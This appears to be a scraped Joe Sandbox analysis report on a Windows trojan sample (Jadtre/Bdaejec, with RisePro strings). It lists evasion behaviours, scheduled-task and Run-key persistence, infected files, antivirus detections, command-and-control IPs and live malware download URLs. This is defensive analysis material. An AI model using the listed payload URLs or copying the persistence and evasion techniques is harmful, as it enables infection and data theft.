            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeCode function: 0_2_04E80C47 rdtsc 0_2_04E80C47
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeCode function: 0_2_00847044 mov eax, dword ptr fs:[00000030h]0_2_00847044
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeCode function: 0_2_00284AB0 mov eax, dword ptr fs:[00000030h]0_2_00284AB0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_00E07044 mov eax, dword ptr fs:[00000030h]8_2_00E07044
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_00844AB0 mov eax, dword ptr fs:[00000030h]8_2_00844AB0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 11_2_00E07044 mov eax, dword ptr fs:[00000030h]11_2_00E07044
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 11_2_00844AB0 mov eax, dword ptr fs:[00000030h]11_2_00844AB0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 17_2_00F07044 mov eax, dword ptr fs:[00000030h]17_2_00F07044
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 17_2_00944AB0 mov eax, dword ptr fs:[00000030h]17_2_00944AB0
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\43f50b5b.bat" "Jump to behavior
            Source: SciTE.exe.2.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
            Source: Lisect_AVT_24003_G1A_37.exe, Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3913589883.0000000000547000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: mProgram Manager
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeCode function: 0_2_0034CCDC GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_0034CCDC
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 2_2_0035139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,2_2_0035139F
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.2.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.2.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.2.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.2.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: Amcache.hve.2.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: MlpxPf.exe PID: 1840, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MlpxPf.exe PID: 7588, type: MEMORYSTR
            Source: Yara matchFile source: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000003.1525002999.0000000005240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000003.1626636551.0000000005240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1453867562.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000003.1524535143.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Lisect_AVT_24003_G1A_37.exe PID: 3712, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 6312, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 1304, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 7572, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: MlpxPf.exe PID: 1840, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MlpxPf.exe PID: 7588, type: MEMORYSTR
            Source: Yara matchFile source: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000003.1525002999.0000000005240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000003.1626636551.0000000005240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1453867562.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000003.1524535143.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Lisect_AVT_24003_G1A_37.exe PID: 3712, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 6312, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 1304, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 7572, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            Valid Accounts2
            Native API
            1
            Scripting
            1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            11
            Input Capture
            11
            System Time Discovery
            1
            Taint Shared Content
            1
            Archive Collected Data
            2
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            3
            Obfuscated Files or Information
            LSASS Memory4
            File and Directory Discovery
            Remote Desktop Protocol11
            Input Capture
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job
            1
            Scheduled Task/Job
            12
            Process Injection
            13
            Software Packing
            Security Account Manager215
            System Information Discovery
            SMB/Windows Admin SharesData from Network Shared Drive11
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCron1
            Registry Run Keys / Startup Folder
            1
            Scheduled Task/Job
            1
            DLL Side-Loading
            NTDS1
            Query Registry
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
            Registry Run Keys / Startup Folder
            1
            Masquerading
            LSA Secrets751
            Security Software Discovery
            SSHKeylogging12
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts24
            Virtualization/Sandbox Evasion
            Cached Domain Credentials24
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation
            DCSync2
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Process Injection
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1481140 Sample: Lisect_AVT_24003_G1A_37.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 55 ddos.dnsnb8.net 2->55 61 Antivirus detection for URL or domain 2->61 63 Antivirus detection for dropped file 2->63 65 Antivirus / Scanner detection for submitted sample 2->65 67 9 other signatures 2->67 9 Lisect_AVT_24003_G1A_37.exe 1 10 2->9         started        14 RageMP131.exe 2 2->14         started        16 MPGPH131.exe 2 2->16         started        18 MPGPH131.exe 2 2->18         started        signatures3 process4 dnsIp5 59 193.233.132.62, 49706, 49712, 49713 FREE-NET-ASFREEnetEU Russian Federation 9->59 47 C:\Users\user\AppData\Local\Temp\MlpxPf.exe, PE32 9->47 dropped 49 C:\Users\user\AppData\Local\...\RageMP131.exe, PE32 9->49 dropped 51 C:\ProgramData\MPGPH131\MPGPH131.exe, PE32 9->51 dropped 53 2 other malicious files 9->53 dropped 77 Detected unpacking (changes PE section rights) 9->77 79 Found stalling execution ending in API Sleep call 9->79 81 Uses schtasks.exe or at.exe to add and modify task schedules 9->81 99 2 other signatures 9->99 20 MlpxPf.exe 16 9->20         started        25 schtasks.exe 1 9->25         started        27 schtasks.exe 1 9->27         started        83 Antivirus detection for dropped file 14->83 85 Multi AV Scanner detection for dropped file 14->85 87 Tries to detect sandboxes and other dynamic analysis tools (window names) 14->87 29 MlpxPf.exe 1 26 14->29         started        89 Machine Learning detection for dropped file 16->89 91 Tries to evade debugger and weak emulator (self modifying code) 16->91 93 Hides threads from debuggers 16->93 95 Tries to detect sandboxes / dynamic malware analysis system (registry check) 18->95 97 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->97 file6 signatures7 process8 dnsIp9 57 ddos.dnsnb8.net 44.221.84.105, 49704, 49705, 49717 AMAZON-AESUS United States 20->57 41 C:\Program Files\7-Zip\Uninstall.exe, PE32 20->41 dropped 43 C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32 20->43 dropped 45 C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS 20->45 dropped 69 Antivirus detection for dropped file 20->69 71 Multi AV Scanner detection for dropped file 20->71 73 Detected unpacking (changes PE section rights) 20->73 75 2 other signatures 20->75 31 WerFault.exe 19 16 20->31         started        33 conhost.exe 25->33         started        35 conhost.exe 27->35         started        37 cmd.exe 29->37         started        file10 signatures11 process12 process13 39 conhost.exe 37->39         started       

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Lisect_AVT_24003_G1A_37.exe95%ReversingLabsWin32.Virus.Jadtre
            Lisect_AVT_24003_G1A_37.exe85%VirustotalBrowse
            Lisect_AVT_24003_G1A_37.exe100%AviraW32/Jadtre.B
            Lisect_AVT_24003_G1A_37.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\RageMP131\RageMP131.exe100%AviraW32/Jadtre.B
            C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
            C:\Users\user\AppData\Local\Temp\MlpxPf.exe100%AviraTR/Dldr.Small.Z.haljq
            C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
            C:\ProgramData\MPGPH131\MPGPH131.exe100%AviraW32/Jadtre.B
            C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
            C:\Users\user\AppData\Local\RageMP131\RageMP131.exe100%Joe Sandbox ML
            C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\MlpxPf.exe100%Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
            C:\ProgramData\MPGPH131\MPGPH131.exe100%Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
            C:\ProgramData\MPGPH131\MPGPH131.exe95%ReversingLabsWin32.Virus.Jadtre
            C:\Users\user\AppData\Local\RageMP131\RageMP131.exe95%ReversingLabsWin32.Virus.Jadtre
            C:\Users\user\AppData\Local\Temp\MlpxPf.exe92%ReversingLabsWin32.Trojan.Madeba
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://www.scintilla.org/scite.rng0%URL Reputationsafe
            http://www.rftp.comJosiah0%URL Reputationsafe
            http://www.activestate.com0%URL Reputationsafe
            http://www.activestate.comHolger0%URL Reputationsafe
            http://ddos.dnsnb8.net:799/cj//k3.rar100%URL Reputationmalware
            http://upx.sf.net0%URL Reputationsafe
            http://www.rftp.com0%URL Reputationsafe
            http://ddos.dnsnb8.net:799/cj//k2.rar100%URL Reputationmalware
            http://www.baanboard.comBrendon0%URL Reputationsafe
            https://www.smartsharesystems.com/0%URL Reputationsafe
            http://www.scintilla.org0%URL Reputationsafe
            http://www.spaceblue.comMathias0%URL Reputationsafe
            https://www.smartsharesystems.com/Morten0%URL Reputationsafe
            http://www.develop.com0%URL Reputationsafe
            http://www.lua.org0%URL Reputationsafe
            http://ddos.dnsnb8.net:799/cj//k1.rar100%URL Reputationmalware
            http://www.spaceblue.com0%URL Reputationsafe
            http://www.winimage.com/zLibDll0%URL Reputationsafe
            http://www.baanboard.com0%URL Reputationsafe
            http://www.develop.comDeepak0%URL Reputationsafe
            http://ddos.dnsnb8.net:799/cj//k5.rarY100%Avira URL Cloudmalware
            https://t.me/RiseProSUPPORTuH0%Avira URL Cloudsafe
            https://t.me/RiseProSUPPORTu0%Avira URL Cloudsafe
            http://ddos.dnsnb8.net:799/cj//k2.rar=6100%Avira URL Cloudphishing
            https://t.me/RiseProSUPPORT0%Avira URL Cloudsafe
            http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
            https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll0%Avira URL Cloudsafe
            http://ddos.dnsnb8.net:799/cj//k2.rarp100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k1.rarH100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k5.rarq100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k5.rar100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k4.rarC:100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k1.rar66100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k2.rar#7100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k1.rar.7100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k4.rar100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k2.rarS6100%Avira URL Cloudmalware
            http://ddos.dnsnb8.net:799/cj//k3.rart100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k5.rarcC:100%Avira URL Cloudphishing
            http://ddos.dnsnb8.net:799/cj//k4.rark100%Avira URL Cloudphishing
            NameIPActiveMaliciousAntivirus DetectionReputation
            ddos.dnsnb8.net
            44.221.84.105
            truefalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://ddos.dnsnb8.net:799/cj//k3.rartrue
              • URL Reputation: malware
              unknown
              http://ddos.dnsnb8.net:799/cj//k2.rartrue
              • URL Reputation: malware
              unknown
              http://ddos.dnsnb8.net:799/cj//k5.rarfalse
              • Avira URL Cloud: malware
              unknown
              http://ddos.dnsnb8.net:799/cj//k1.rartrue
              • URL Reputation: malware
              unknown
              http://ddos.dnsnb8.net:799/cj//k4.rarfalse
              • Avira URL Cloud: phishing
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://ddos.dnsnb8.net:799/cj//k5.rarYMlpxPf.exe, 00000012.00000002.1802677497.0000000001248000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              https://t.me/RiseProSUPPORTuLisect_AVT_24003_G1A_37.exe, 00000000.00000002.3925994112.0000000000D7E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.scintilla.org/scite.rngSciTE.exe.2.drfalse
              • URL Reputation: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k2.rar=6MlpxPf.exe, 00000002.00000002.1570645851.000000000138A000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              http://www.rftp.comJosiahSciTE.exe.2.drfalse
              • URL Reputation: safe
              unknown
              https://t.me/RiseProSUPPORTuHRageMP131.exe, 00000011.00000002.3926399137.000000000169E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.activestate.comSciTE.exe.2.drfalse
              • URL Reputation: safe
              unknown
              http://www.activestate.comHolgerSciTE.exe.2.drfalse
              • URL Reputation: safe
              unknown
              http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEMlpxPf.exe, 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmp, MlpxPf.exe, 00000002.00000003.1447308888.0000000001120000.00000004.00001000.00020000.00000000.sdmp, MlpxPf.exe, 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmp, MlpxPf.exe, 00000012.00000003.1617245966.0000000001380000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dllLisect_AVT_24003_G1A_37.exe, 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Lisect_AVT_24003_G1A_37.exe, 00000000.00000003.1453867562.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 00000008.00000003.1524535143.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000003.1525002999.0000000005240000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, RageMP131.exe, 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000011.00000003.1626636551.0000000005240000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://upx.sf.netAmcache.hve.2.drfalse
              • URL Reputation: safe
              unknown
              http://www.rftp.comSciTE.exe.2.drfalse
              • URL Reputation: safe
              unknown
              https://t.me/RiseProSUPPORTLisect_AVT_24003_G1A_37.exe, 00000000.00000002.3925994112.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.3926322511.0000000000F1D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000002.3926018738.000000000167A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000011.00000002.3926399137.000000000169E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k1.rarHMlpxPf.exe, 00000012.00000003.1624031200.00000000012B0000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              http://ddos.dnsnb8.net:799/cj//k2.rarpMlpxPf.exe, 00000002.00000002.1571008023.0000000002E2A000.00000004.00000010.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://ddos.dnsnb8.net:799/cj//k5.rarqMlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://www.baanboard.comBrendonSciTE.exe.2.drfalse
              • URL Reputation: safe
              unknown
              https://www.smartsharesystems.com/SciTE.exe.2.drfalse
              • URL Reputation: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k4.rarC:MlpxPf.exe, 00000012.00000002.1802677497.0000000001286000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://www.scintilla.orgSciTE.exe.2.drfalse
              • URL Reputation: safe
              unknown
              http://www.spaceblue.comMathiasSciTE.exe.2.drfalse
              • URL Reputation: safe
              unknown
              https://www.smartsharesystems.com/MortenSciTE.exe.2.drfalse
              • URL Reputation: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k2.rar#7MlpxPf.exe, 00000002.00000002.1570645851.000000000138A000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              http://ddos.dnsnb8.net:799/cj//k1.rar.7MlpxPf.exe, 00000002.00000003.1465075782.0000000001392000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://www.develop.comSciTE.exe.2.drfalse
              • URL Reputation: safe
              unknown
              http://www.lua.orgSciTE.exe.2.drfalse
              • URL Reputation: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k1.rar66MlpxPf.exe, 00000002.00000003.1465075782.0000000001392000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://www.spaceblue.comSciTE.exe.2.drfalse
              • URL Reputation: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k2.rarS6MlpxPf.exe, 00000002.00000002.1570645851.000000000138A000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://www.winimage.com/zLibDllLisect_AVT_24003_G1A_37.exe, 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Lisect_AVT_24003_G1A_37.exe, 00000000.00000003.1453867562.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 00000008.00000003.1524535143.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000003.1525002999.0000000005240000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, RageMP131.exe, 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000011.00000003.1626636551.0000000005240000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k5.rarcC:MlpxPf.exe, 00000012.00000002.1802677497.0000000001286000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: phishing
              unknown
              http://www.baanboard.comSciTE.exe.2.drfalse
              • URL Reputation: safe
              unknown
              http://www.develop.comDeepakSciTE.exe.2.drfalse
              • URL Reputation: safe
              unknown
              http://ddos.dnsnb8.net:799/cj//k3.rartMlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              http://ddos.dnsnb8.net:799/cj//k4.rarkMlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: phishing
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              44.221.84.105
              ddos.dnsnb8.netUnited States
              14618AMAZON-AESUSfalse
              193.233.132.62
              unknownRussian Federation
              2895FREE-NET-ASFREEnetEUfalse
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1481140
              Start date and time:2024-07-25 04:52:11 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 11m 37s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:25
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:Lisect_AVT_24003_G1A_37.exe
              Detection:MAL
              Classification:mal100.spre.troj.evad.winEXE@26/29@1/2
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 20.189.173.22
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              TimeTypeDescription
              04:53:16Task SchedulerRun new task: MPGPH131 HR path: C:\ProgramData\MPGPH131\MPGPH131.exe
              04:53:16Task SchedulerRun new task: MPGPH131 LG path: C:\ProgramData\MPGPH131\MPGPH131.exe
              04:53:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
              04:53:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
              22:53:22API Interceptor1x Sleep call for process: WerFault.exe modified
              22:53:40API Interceptor5665446x Sleep call for process: Lisect_AVT_24003_G1A_37.exe modified
              22:53:47API Interceptor5507x Sleep call for process: MPGPH131.exe modified
              22:53:59API Interceptor4291522x Sleep call for process: RageMP131.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              44.221.84.105Lisect_AVT_24003_G1A_72.exeGet hashmaliciousLummaC, Bdaejec, LummaC StealerBrowse
              • ddos.dnsnb8.net:799/cj//k2.rar
              Lisect_AVT_24003_G1A_5.exeGet hashmaliciousQuasar, BdaejecBrowse
              • ddos.dnsnb8.net:799/cj//k1.rar
              Lisect_AVT_24003_G1A_16.exeGet hashmaliciousBdaejecBrowse
              • ddos.dnsnb8.net:799/cj//k2.rar
              LisectAVT_2403002C_193.exeGet hashmaliciousBdaejec, MetasploitBrowse
              • ddos.dnsnb8.net:799/cj//k3.rar
              LisectAVT_2403002C_196.exeGet hashmaliciousBdaejecBrowse
              • ddos.dnsnb8.net:799/cj//k1.rar
              LisectAVT_2403002B_91.exeGet hashmaliciousBdaejec, DBatLoaderBrowse
              • ddos.dnsnb8.net:799/cj//k2.rar
              LisectAVT_2403002B_492.exeGet hashmaliciousBdaejec, LokibotBrowse
              • ddos.dnsnb8.net:799/cj//k5.rar
